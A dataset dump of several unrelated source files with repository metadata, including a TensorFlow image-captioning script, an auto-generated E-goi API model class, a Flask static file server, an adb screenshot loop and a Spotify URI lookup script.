train_images_list = os.listdir('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/')
sample_size = 30
train_images_list = train_images_list[:sample_size]
size = (256, 256)
num_channels = 3
train = np.array([None] * sample_size)
real_images = np.array([None] * sample_size)
j = 0
for i in train_images_list:
real_images[j] = np.array(plt.imread('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/' + i))
train[j] = np.array(plt.imread('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/' + i))
j += 1
j = 0
for i in train:
train[j] = cv2.resize(i, size)
train[j] = train[j].reshape(1, size[0], size[1], num_channels)
j += 1
train = np.vstack(train[:])
plt.imshow(np.squeeze(train[0]))
plt.show()
#%%
train_captions = pd.read_csv('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/data.csv', delimiter='|')
def get_images_id(names):
names = [int(x.split('_')[-1].split('.')[0]) for x in names]
return names
train_captions.columns = ['image_name', 'comment_number', 'comment']
def images_map_caption(train_images_list, train_captions):
caption = []
for i in train_images_list:
caption.append(train_captions[train_captions['image_name'] == i]['comment'].iat[0])
return caption
captions = np.array(images_map_caption(train_images_list, train_captions))
print(captions.shape)
#%%
start_tag = '<s>'
end_tag = '<e>'
def get_vocab(captions):
arr = []
m = captions.shape[0]
sentence = [None ] * m
j = 0
for i in captions:
i = re.sub(' +',' ',i)
i = start_tag + ' ' + i + ' ' + end_tag
sentence[j] = i.split()
j += 1
arr = arr + i.split()
arr = list(set(arr))
vocab_size = len(arr)
j = 0
fwd_dict = {}
rev_dict = {}
j = 0
for i in arr:
fwd_dict[i] = j
rev_dict[j] = i
j += 1
return vocab_size, sentence, fwd_dict, rev_dict
vocab_size, sentences, fwd_dict, rev_dict = get_vocab(captions)
#%%
m = len(sentences)
train_caption = [None] * m
i = 0
for sentence in sentences:
cap_array = None
for word in sentence:
row = [0]
col = [fwd_dict[word]]
data = [1]
if cap_array is None:
cap_array = csr_matrix((data, (row, col)), shape=(1, vocab_size))
else:
cap_array = vstack((cap_array, csr_matrix((data, (row, col)), shape=(1, vocab_size))))
train_caption[i] = cap_array
i += 1
train_caption[0].shape
#%%
def create_weights(shape, suffix):
return tf.Variable(tf.truncated_normal(shape, stddev=0.7), name='W_' + suffix)
def create_biases(size, suffix):
return tf.Variable(tf.zeros([size]), name='b_' + suffix)
def conv_layer(inp, kernel_shape, num_channels, num_kernels, suffix):
filter_shape = [kernel_shape[0], kernel_shape[1], num_channels, num_kernels]
weights = create_weights(shape=filter_shape, suffix=suffix)
biases = create_biases(num_kernels, suffix=suffix)
layer = tf.nn.conv2d(input=inp, filter=weights, padding='SAME', strides=[1, 1, 1, 1], name='conv_' + suffix)
layer += biases
layer = tf.nn.relu6(layer, name='relu_' + suffix)
#layer = tf.nn.max_pool(layer, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
return layer
def flatten_layer(layer, suffix):
layer_shape = layer.get_shape()
num_features = layer_shape[1:4].num_elements()
layer = tf.reshape(layer, [-1, num_features], name='flat_' + suffix )
return layer
def dense_layer(inp, num_inputs, num_outputs, suffix, use_relu=True):
weights = create_weights([num_inputs, num_outputs], suffix)
biases = create_biases(num_outputs, suffix)
layer = tf.matmul(inp, weights) + biases
layer = tf.nn.relu(layer)
return layer
def rnn_cell(Win ,Wout, Wfwd, b, hprev, inp):
h = tf.tanh(tf.add(tf.add(tf.matmul(inp, Win), tf.matmul(hprev, Wfwd)), b))
    out = tf.matmul(h, Wout)
return h, out
#%%
learning_rate = 0.0001
training_iters = 5000
display_step = 1000
max_sent_limit = 50
num_tests = 12
bridge_size = 1024
keep_prob = 0.3
x_caption = tf.placeholder(tf.float32, [None, vocab_size], name = 'x_caption')
x_inp = tf.placeholder(tf.float32, shape=[1, size[0],size[1],num_channels], name='x_image')
y = tf.placeholder(tf.float32, [None, vocab_size], name='y_caption')
Wconv = tf.Variable(tf.truncated_normal([bridge_size, vocab_size], stddev=0.7))
bconv = tf.Variable(tf.zeros([1, vocab_size]))
Wi= tf.Variable(tf.truncated_normal([vocab_size, vocab_size], stddev=0.7))
Wf= tf.Variable(tf.truncated_normal([vocab_size, vocab_size], stddev=0.7))
Wo= tf.Variable(tf.truncated_normal([vocab_size, vocab_size], stddev=0.7))
b = tf.Variable(tf.zeros([1, vocab_size]))
layer_conv1 = conv_layer(inp=x_inp, kernel_shape=(3, 3), num_kernels=32, num_channels=3, suffix='1')
layer_conv2 = conv_layer(inp=layer_conv1, kernel_shape=(3, 3), num_kernels=32, num_channels=32, suffix='2')
maxpool1 = tf.nn.max_pool(layer_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
layer_conv3 = conv_layer(inp=maxpool1, kernel_shape=(3, 3), num_kernels=64, num_channels=32, suffix='3')
layer_conv4 = conv_layer(inp=layer_conv3, kernel_shape=(3, 3), num_kernels=64, num_channels=64, suffix='4')
maxpool2 = tf.nn.max_pool(layer_conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
layer_conv5 = conv_layer(inp=maxpool2, kernel_shape=(3, 3), num_kernels=128, num_channels=64, suffix='5')
layer_conv6 = conv_layer(inp=layer_conv5, kernel_shape=(3, 3), num_kernels=128, num_channels=128, suffix='6')
maxpool3 = tf.nn.max_pool(layer_conv6, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
layer_conv7 = conv_layer(inp=maxpool3, kernel_shape=(3, 3), num_kernels=256, num_channels=128, suffix='7')
layer_conv8 = conv_layer(inp=layer_conv7, kernel_shape=(3, 3), num_kernels=256, num_channels=256, suffix='8')
flat_layer = flatten_layer(layer_conv8, suffix='9')
dense_layer_1 = dense_layer(inp=flat_layer, num_inputs=262144 , num_outputs=bridge_size, suffix='10')
start_hook = tf.cast(csr_matrix(([1], ([0], [fwd_dict[start_tag]])), shape=(1, vocab_size)).A, tf.float32)
end_hook = tf.cast(csr_matrix(([1], ([0], [fwd_dict[end_tag]])), shape=(1, vocab_size)).A, tf.float32)
hook = tf.slice(x_caption, [0, 0], [1, vocab_size])
h = dense_layer_1
h, out = rnn_cell(Wi ,Wo, Wconv, bconv, h, hook)
def fn(prev, curr):
h = prev[0]
curr = tf.reshape(curr, [1, vocab_size])
h, out = rnn_cell(Wi ,Wo, Wf, b, h, curr)
return h, out
_, output = tf.scan(fn, x_caption[1:], initializer=(h, out))
output = tf.squeeze(output, axis = 1)
outputs = tf.concat([out, output], axis = 0)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=outputs, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
pred = tf.nn.softmax(outputs)
#%%
correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
out_tensor = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size = 0)
htest = dense_layer_1
htest, out_first = rnn_cell(Wi ,Wo, Wconv, bconv, htest, start_hook)
t = 0
out_ = tf.one_hot(tf.argmax(tf.nn.softmax(out_first), 1), depth=vocab_size)
out_tensor = out_tensor.write(t, out_)
t += 1
def condition(res, h, out_tensor, t):
return tf.logical_and(tf.logical_not(tf.equal(tf.argmax(res, 1)[0], fwd_dict[end_tag])), tf.less(t, max_sent_limit))
def action(res, h, out_tensor, t):
h, out = rnn_cell(Wi ,Wo, Wf, b, h, res)
res = tf.one_hot(tf.argmax(tf.nn.softmax(out), 1), depth=vocab_size)
out_tensor = out_tensor.write(t, res)
return res, h, out_tensor, t + 1
_, __, final_outputs, T = tf.while_loop(condition, action, [out_, htest, out_tensor, t])
final_prediction = tf.squeeze(final_outputs.stack())
saver = tf.train.Saver()
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
m = len(train_caption)
for epoch in range(training_iters):
total_cost = 0
total_acc = 0
for i in range(m):
_, cst, acc = sess.run([optimizer, cost, accuracy], feed_dict = {x_caption:train_caption[i][:-1].A, x_inp:train[i:i+1], y:train_caption[i][1:].A})
total_cost += cst
total_acc += acc
if (epoch + 1) % display_step == 0:
print('After ', (epoch + 1), 'iterations: Cost = ', total_cost / m, 'and Accuracy: ', total_acc * 100/ m , '%' )
print('Optimization finished!')
print("Let's check")
for tests in range(num_tests):
image_num = random.randint(0, sample_size - 1)
caption = sess.run(final_prediction, feed_dict = {x_inp:train[image_num:image_num + 1]})
print(caption.shape)
caption = np.argmax(caption[:-1], 1)
capt = ''
for i in caption:
capt += rev_dict[i] + ' '
print('Predicted Caption:->', capt)
orig_cap = np.argmax(train_caption[image_num:image_num + 1][0][1:-1].A, 1)
orignalcaption = ''
for i in orig_cap:
orignalcaption += rev_dict[i] + ' '
print('Orignal Caption:->', orignalcaption)
plt.imshow(real_images[image_num])
plt.title('Image')
plt.show()
|
[
"[email protected]"
] | |
cf26d52e9926a5a057a1fb70657bda084f53ef49
|
60b1f668808de2b82c2fcb62b07b45bb165219f2
|
/egoi-api/models/form.py
|
4e4d4d5517af495318cbbc38c7b97704ef21786d
|
[] |
no_license
|
andersonmiguel/Egoi
|
6d37bf7a3a7555e764f7a6e792b3ef1c68fe8e20
|
b5f59f9b33ea94e170f4e7e26c6a37a78d2874c2
|
refs/heads/master
| 2022-06-21T07:18:44.920786 | 2020-05-04T17:29:02 | 2020-05-04T17:29:02 | 261,250,618 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,120 |
py
|
# coding: utf-8
"""
APIv3 (Beta)
# Introduction Just a quick peek!!! This is our new version of API. Remember, it is not stable yet!!! But we invite you play with it and give us your feedback ;) # Getting Started E-goi can be integrated with many environments and programming languages via our REST API. We've created a developer focused portal to give your organization a clear and quick overview of how to integrate with E-goi. The developer portal focuses on scenarios for integration and flow of events. We recommend familiarizing yourself with all of the content in the developer portal, before start using our rest API. The E-goi APIv3 is served over HTTPS. To ensure data privacy, unencrypted HTTP is not supported. Request data is passed to the API by POSTing JSON objects to the API endpoints with the appropriate parameters. BaseURL = api.egoiapp.com # RESTful Services This API supports 5 HTTP methods: * <b>GET</b>: The HTTP GET method is used to **read** (or retrieve) a representation of a resource. * <b>POST</b>: The POST verb is most-often utilized to **create** new resources. * <b>PATCH</b>: PATCH is used for **modify** capabilities. The PATCH request only needs to contain the changes to the resource, not the complete resource * <b>PUT</b>: PUT is most-often utilized for **update** capabilities, PUT-ing to a known resource URI with the request body containing the newly-updated representation of the original resource. * <b>DELETE</b>: DELETE is pretty easy to understand. It is used to **delete** a resource identified by a URI. # Authentication We use a custom authentication method, you will need a apikey that you can find in your account settings. Below you will see a curl example to get your account information: #!/bin/bash curl -X GET 'https://api.egoiapp.com/my-account' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' Here you can see a curl Post example with authentication: #!/bin/bash curl -X POST 'http://api.egoiapp.com/tags' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' \\ -H 'Content-Type: application/json' \\ -d '{`name`:`Your custom tag`,`color`:`#FFFFFF`}' # SDK Get started quickly with E-goi with our integration tools. Our SDK is a modern open source library that makes it easy to integrate your application with E-goi services. * <b><a href='https://github.com/E-goi/sdk-java'>Java</a></b> * <b><a href='https://github.com/E-goi/sdk-php'>PHP</a></b> * <b><a href='https://github.com/E-goi/sdk-python'>Python</a></b> <security-definitions/> # noqa: E501
The version of the OpenAPI document: 3.0.0-beta
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from egoi-api.configuration import Configuration
class Form(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'form_id': 'int',
'internal_title': 'str',
'title': 'str',
'language': 'Language',
'list_id': 'int',
'default': 'bool',
'owner': 'int',
'status': 'str',
'created': 'datetime',
'updated': 'datetime'
}
attribute_map = {
'form_id': 'form_id',
'internal_title': 'internal_title',
'title': 'title',
'language': 'language',
'list_id': 'list_id',
'default': 'default',
'owner': 'owner',
'status': 'status',
'created': 'created',
'updated': 'updated'
}
def __init__(self, form_id=None, internal_title='$request.body#/title', title=None, language=None, list_id=None, default=None, owner=None, status=None, created=None, updated=None, local_vars_configuration=None): # noqa: E501
"""Form - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._form_id = None
self._internal_title = None
self._title = None
self._language = None
self._list_id = None
self._default = None
self._owner = None
self._status = None
self._created = None
self._updated = None
self.discriminator = None
if form_id is not None:
self.form_id = form_id
if internal_title is not None:
self.internal_title = internal_title
self.title = title
if language is not None:
self.language = language
if list_id is not None:
self.list_id = list_id
if default is not None:
self.default = default
if owner is not None:
self.owner = owner
if status is not None:
self.status = status
if created is not None:
self.created = created
if updated is not None:
self.updated = updated
@property
def form_id(self):
"""Gets the form_id of this Form. # noqa: E501
:return: The form_id of this Form. # noqa: E501
:rtype: int
"""
return self._form_id
@form_id.setter
def form_id(self, form_id):
"""Sets the form_id of this Form.
:param form_id: The form_id of this Form. # noqa: E501
:type: int
"""
if (self.local_vars_configuration.client_side_validation and
form_id is not None and form_id < 1): # noqa: E501
raise ValueError("Invalid value for `form_id`, must be a value greater than or equal to `1`") # noqa: E501
self._form_id = form_id
@property
def internal_title(self):
"""Gets the internal_title of this Form. # noqa: E501
Internal title of the form # noqa: E501
:return: The internal_title of this Form. # noqa: E501
:rtype: str
"""
return self._internal_title
@internal_title.setter
def internal_title(self, internal_title):
"""Sets the internal_title of this Form.
Internal title of the form # noqa: E501
:param internal_title: The internal_title of this Form. # noqa: E501
:type: str
"""
self._internal_title = internal_title
@property
def title(self):
"""Gets the title of this Form. # noqa: E501
Title of the form # noqa: E501
:return: The title of this Form. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this Form.
Title of the form # noqa: E501
:param title: The title of this Form. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and title is None: # noqa: E501
raise ValueError("Invalid value for `title`, must not be `None`") # noqa: E501
self._title = title
@property
def language(self):
"""Gets the language of this Form. # noqa: E501
:return: The language of this Form. # noqa: E501
:rtype: Language
"""
return self._language
@language.setter
def language(self, language):
"""Sets the language of this Form.
:param language: The language of this Form. # noqa: E501
:type: Language
"""
self._language = language
@property
def list_id(self):
"""Gets the list_id of this Form. # noqa: E501
:return: The list_id of this Form. # noqa: E501
:rtype: int
"""
return self._list_id
@list_id.setter
def list_id(self, list_id):
"""Sets the list_id of this Form.
:param list_id: The list_id of this Form. # noqa: E501
:type: int
"""
if (self.local_vars_configuration.client_side_validation and
list_id is not None and list_id < 1): # noqa: E501
raise ValueError("Invalid value for `list_id`, must be a value greater than or equal to `1`") # noqa: E501
self._list_id = list_id
@property
def default(self):
"""Gets the default of this Form. # noqa: E501
True if this is the default form in the list, false otherwise # noqa: E501
:return: The default of this Form. # noqa: E501
:rtype: bool
"""
return self._default
@default.setter
def default(self, default):
"""Sets the default of this Form.
True if this is the default form in the list, false otherwise # noqa: E501
:param default: The default of this Form. # noqa: E501
:type: bool
"""
self._default = default
@property
def owner(self):
"""Gets the owner of this Form. # noqa: E501
:return: The owner of this Form. # noqa: E501
:rtype: int
"""
return self._owner
@owner.setter
def owner(self, owner):
"""Sets the owner of this Form.
:param owner: The owner of this Form. # noqa: E501
:type: int
"""
if (self.local_vars_configuration.client_side_validation and
owner is not None and owner < 1): # noqa: E501
raise ValueError("Invalid value for `owner`, must be a value greater than or equal to `1`") # noqa: E501
self._owner = owner
@property
def status(self):
"""Gets the status of this Form. # noqa: E501
Status of the form # noqa: E501
:return: The status of this Form. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Form.
Status of the form # noqa: E501
:param status: The status of this Form. # noqa: E501
:type: str
"""
allowed_values = ["active", "unpublished", "cloned", "deleted"] # noqa: E501
if self.local_vars_configuration.client_side_validation and status not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def created(self):
"""Gets the created of this Form. # noqa: E501
The date and time # noqa: E501
:return: The created of this Form. # noqa: E501
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this Form.
The date and time # noqa: E501
:param created: The created of this Form. # noqa: E501
:type: datetime
"""
self._created = created
@property
def updated(self):
"""Gets the updated of this Form. # noqa: E501
The date and time # noqa: E501
:return: The updated of this Form. # noqa: E501
:rtype: datetime
"""
return self._updated
@updated.setter
def updated(self, updated):
"""Sets the updated of this Form.
The date and time # noqa: E501
:param updated: The updated of this Form. # noqa: E501
:type: datetime
"""
self._updated = updated
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Form):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Form):
return True
return self.to_dict() != other.to_dict()
|
[
"[email protected]"
] | |
d022c401cac71d8aef3ec744f424139b4bfc884d
|
88ca4006c4d624320002c3f939f27e2ba3a59a5a
|
/ch6_queue.py
|
53936cf17d2c92ec70739941c09ef32b7b45e402
|
[] |
no_license
|
sunice/PythonPractice
|
28dcf2bb5666f19e538c31783063f65b830ba7c3
|
64a4feb354fd84f64e193a8c5e62364fb50541bc
|
refs/heads/master
| 2016-09-06T12:50:51.491985 | 2015-05-25T00:49:51 | 2015-05-25T00:49:51 | 35,148,274 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 712 |
py
|
queue = []
def enQ():
queue.append(raw_input(' Enter New string: ').strip())
def deQ():
if len(queue) == 0:
print 'Cannot pop from an empty queue!'
else:
print 'Removed [', `queue.pop(0)`, ']'
def viewQ():
print queue
CMDs = {'e': enQ, 'd': deQ, 'v': viewQ}
def showmenu():
pr = """
(E)nqueue
(D)equeue
(V)iew
(Q)uit
Enter choice: """
while True:
while True:
try:
choice = raw_input(pr).strip()[0].lower()
except (EOFError, KeyboardInterrupt, IndexError):
choice = 'q'
print '\nYou picked: [%s]' % choice
if choice not in 'devq':
print 'Invalid option, try again'
else:
break
if choice == 'q':
break
CMDs[choice]()
if __name__ == '__main__':
showmenu()
|
[
"[email protected]"
] | |
85596fb3ff870c316d4d7b3553f515d5d673f9b9
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/tags/2007/desktop/kde/autostart/actions.py
|
5bd7b2827ebfb6bdfc4093743e2fb7ed2daacc96
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 286 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import kde
def setup():
kde.configure()
def build():
kde.make()
def install():
kde.install()
|
[
"[email protected]"
] | |
05b6c7a41ca37a887e8c167923f6e78cb61e66c6
|
0f9772eef40e6a995514438020bfe245b0634d23
|
/UnicornsApp/app.py
|
f55610ece2f5f38113de2cbbcf76253188d21c2f
|
[] |
no_license
|
koalaboy808/Crunchbase_InfoViz
|
4edeedd1236fcd0c0e6558cceb5d4dda75ef7c1d
|
d184190a45dfeff2c92223549e0d74fb076eef19
|
refs/heads/master
| 2021-01-01T05:02:11.590233 | 2016-05-06T12:29:58 | 2016-05-06T12:29:58 | 56,036,487 | 3 | 0 | null | 2016-04-22T22:33:15 | 2016-04-12T06:17:33 |
HTML
|
UTF-8
|
Python
| false | false | 398 |
py
|
from flask import Flask
app = Flask(__name__, static_folder="public_html/static")
@app.route('/')
def load_root():
f = open('public_html/index.html', 'r')
raw_data = f.read()
return raw_data
@app.route('/<path:name>')
def load_file(name=None):
url = 'public_html/' + name
f = open(url, 'r')
raw_data = f.read()
return raw_data
if __name__ == "__main__":
app.run()
|
[
"[email protected]"
] | |
9446b56384f1741e397ae19977d5a6629a625280
|
8d51d35013a4081af42a5d2388c4df960b01ead5
|
/adb_screen.py
|
69fe5f88c496d65de655502e369e1f931f7fc076
|
[] |
no_license
|
1998Don/ledi_git
|
9eae06c6a1c36736f74a56499f52266fd125ea4d
|
b05487361a5536593c842d2587adf0787e7390b1
|
refs/heads/master
| 2023-05-18T03:45:41.772941 | 2021-06-11T04:19:00 | 2021-06-11T04:19:00 | 353,873,956 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 530 |
py
|
import os
import time
class ScreenRobot:
def screen(self,count):
        # take a screenshot and save it to the device's sdcard
os.system(f"adb shell screencap -p /sdcard/{count}.png")
if __name__ == '__main__':
count = 1
robot = ScreenRobot()
while True:
try:
robot.screen(count)
os.system(f"adb pull -a /sdcard/{count}.png")
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), f'picture{count}.png')
time.sleep(0.5)
count += 1
except:
break
|
[
"[email protected]"
] | |
4bc54103403acae606e53e6f343613459226f1bf
|
e0709b5108445182a64a64acd1fc0523c903aeea
|
/app/urls.py
|
c89c2f3f558822e0ec6f837c824a2b2e3daf3a94
|
[] |
no_license
|
SusanaPavez/ninja-gold
|
1c26fa40aeabf0d45580f02c72861a55d3e7726a
|
2f02eab0acefa5acb6da2653bc8c57eaf2770b95
|
refs/heads/master
| 2023-07-09T20:25:05.218740 | 2021-08-10T00:50:36 | 2021-08-10T00:50:36 | 394,426,269 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 162 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('juegos/' , views.juego),
path('reset/', views.reset),
]
|
[
"[email protected]"
] | |
9d7a71d485c1957b6370b2641222562691b42037
|
3f40cd227393a1e9c1e76d7da3c9aaefe0581279
|
/venv/main.py
|
35680094676b7cbe1011d7743b8c5b27172918f8
|
[] |
no_license
|
ponikka/Cardano
|
5df4075a98abc1f3360bc9ce2b06b3f072b41f74
|
01c0c47d99a4649f2ab23321f8be78e0f16b900f
|
refs/heads/master
| 2021-02-09T11:47:36.879496 | 2020-03-02T08:16:12 | 2020-03-02T08:16:12 | 244,184,774 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,273 |
py
|
from tabulate import tabulate
from random import choice
from string import ascii_uppercase
from math import sqrt, ceil
alphabet = list(ascii_uppercase)
word = input('Enter the phrase\n').upper()
side = ceil(sqrt(len(word)))
if side % 2 != 0:
side = side + 1
square = [[0] * side for i in range(side)]
for i in range(side): # create the cipher key
for j in range(side // 2):
square[i][j] = 1
print('The KEY:')
print(tabulate(square, tablefmt='grid'))
count = 0
for i in range(side // 2):
for j in range(side):
if square[i][j] == 1 and len(word) > count:
square[i][j] = word[count]
square[i][side - j - 1] = word[count + (side//2)*(side//2)]
count = count + 1
count = count + count
for i in range(side // 2, side):
for j in range(side):
if square[i][j] == 1 and len(word) > count:
square[i][j] = word[count]
if len(word) > count + side:
square[i][side - j - 1] = word[count + (side//2)*(side//2)]
count = count + 1
print("Final table:")
for i in range(side):
for j in range(side):
if square[i][j] == 1 or square[i][j] == 0:
square[i][j] = choice(alphabet)
print(tabulate(square, tablefmt='grid'))
|
[
"[email protected]"
] | |
9070f9ba6596fb792ae2d17601a5a9c0581820c3
|
fd8405ac0a5d062907c153f2f2e3569571366539
|
/irbisbooks/core/urls.py
|
17e44ae4a60722f69bb0d5da5d79b7b2b8dec070
|
[] |
no_license
|
ri-gilfanov/irbis-books
|
aab471833035ae51088bccfb0806b863aaba3468
|
0b2a32013ab7f0c0d167e0864a7cb858e8e75add
|
refs/heads/master
| 2021-01-25T13:19:07.818513 | 2018-03-02T09:47:06 | 2018-03-02T09:47:06 | 121,642,933 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 191 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.book_search, name='book_search'),
path('book_download/', views.book_download, name='book_download'),
]
|
[
"[email protected]"
] | |
d4ed49c5ad66c87e5989c74f78149de700205878
|
d104df89c9eeb210a10d45fb11b80bad6e53b30a
|
/150520/new_uri.py
|
39306da7bacddbbb8aacf3c6b09387a758ca5892
|
[] |
no_license
|
tbc31cc/Python-scripts
|
119c54014c1379627237463a65c2b55bf7b5d4ca
|
1e38fe3359401b5a150eed191bbcf39dbafc3e1f
|
refs/heads/master
| 2021-01-10T21:55:25.479996 | 2015-05-20T21:48:47 | 2015-05-20T21:48:47 | 35,639,821 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,617 |
py
|
# Sometimes Spotify stores multiple entries for an album or track, or you may accidentally add an album/track that isn't available in your country
# If you choose a bad URI with the original search, use this to load a new entry that hopefully works
# Now filters out results that are not available in specified country (US) (new method)
# Program now asks user to re-enter searchtype in the case of an invalid entry
# User can choose to open entire list of results as a text file
# Use with command line ""C:\Python27\Lib\new_uri.py" "$ascii(%artist%)" "$ascii(%album%)" "$ascii(%title%)""
import sys
import spotipy #third-party module
import pyperclip #third-party module
import string
spotify = spotipy.Spotify()
display = "URI(s) copied to clipboard. Press enter to exit"
# Specified country
country = u'US'
# args = [path, artist, album, track], taken from command line
if len(sys.argv) > 1:
artist_name = sys.argv[1]
else:
artist_name = str(raw_input('Enter artist name: '))
# Choose advanced search type (track or album)
valid_types = ['track','album']
def get_valid_type():
i = str(raw_input("Please type track or album: "))
if i in valid_types:
return i
else:
return None
while True:
searchtype = get_valid_type()
if searchtype:
break
if searchtype == 'album':
if len(sys.argv) > 2:
item = sys.argv[2]
else:
item = str(raw_input('Enter album title: '))
elif searchtype == 'track':
if len(sys.argv) > 3:
item = sys.argv[3]
else:
item = str(raw_input('Enter track title: '))
print 'Finding URI for ' + searchtype +': ' + '"'+item+'"' + ' by ' + artist_name
# Generate search results
results = spotify.search(q="artist:"+artist_name+' '+searchtype+':'+item, type = searchtype, limit = 20)
items = results[searchtype+'s']['items']
# Filter out results not available in specified country
for i, t in enumerate(items):
if country not in items[i]['available_markets']:
items[i] = []
while [] in items:
items.remove([])
# Shorten long strings
def shorten(string):
if len(string) > 80:
return string[0:80]+'...'
else:
return string
# Function for generating list of results
def print_info(i,t):
name = filter(lambda x: x in string.printable, t['name'])
album_type = ''
artist = ''
album = ''
release_date = ''
if searchtype == 'album':
get_artist = spotify.album(t['id'])
artist_name = get_artist['artists'][0]['name']
release_date = ' ('+get_artist['release_date'][0:4]+') '
artist = filter(lambda x: x in string.printable, ' '+artist_name)
if items[i]['album_type'] != 'album':
album_type = ' - '+t['album_type']
line1 = ' '+str(i)+' '+name+album_type+release_date
elif searchtype == 'track':
artist = filter(lambda x: x in string.printable, ' '+t['artists'][0]['name']+'\n')
album = filter(lambda x: x in string.printable, ' from '+'"'+t['album']['name'])
line1 = shorten(' '+str(i)+' '+name+album)+'"'
else:
line1 = ' '+str(i)+' '+name
line2 = '\n'+artist
line3 = '\n '+t['uri']+'\n'
return line1+line2+line3
# If there are multiple results, let user choose which URI to copy to clipboard.
# Searches with one result automatically copies URI.
print '\nResults:\n'
if len(items) > 0:
for i, t in enumerate(items):
print print_info(i,t)
if len(items) == 1:
n = 0
else:
n = int(input("Choose from provided list. Enter -1 to choose all items "))
# Copy final result to clipboard/Open full list as text file
if n == -1:
text = ''
for i, t in enumerate(items):
text = text + '\n' + print_info(i,t)
import subprocess as sp
programName = 'notepad.exe'
with open('output.txt', 'w') as text_file:
text_file.write(text)
sp.Popen([programName,'output.txt'])
else:
text = items[n]['uri']
pyperclip.copy(text)
else:
print 'No results found\n'
text = 'No results found'
display = 'Press enter to exit'
raw_input(display)
|
[
"[email protected]"
] | |
60ce8d44e75ecb0dd3ee8a66f4522c00b97994c7
|
e7613f9e21d558cdb304f7268fdec433bbbbf08f
|
/Ohloh.py
|
d91bcdbab7382ccb1b354e773d337075b4dad563
|
[] |
no_license
|
mdavid/web
|
0ea1b67ce2c6006d10c79638f345b344b1aeb129
|
53fd4ca7e2c0053f27bca9384f6b3cc142a17122
|
refs/heads/master
| 2020-12-25T16:35:34.746167 | 2011-11-21T23:08:02 | 2011-11-21T23:08:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,746 |
py
|
# -*- Mode: python; coding: utf-8 -*-
#
# Cherokee Web Site
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
#
# Copyright (C) 2001-2011 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
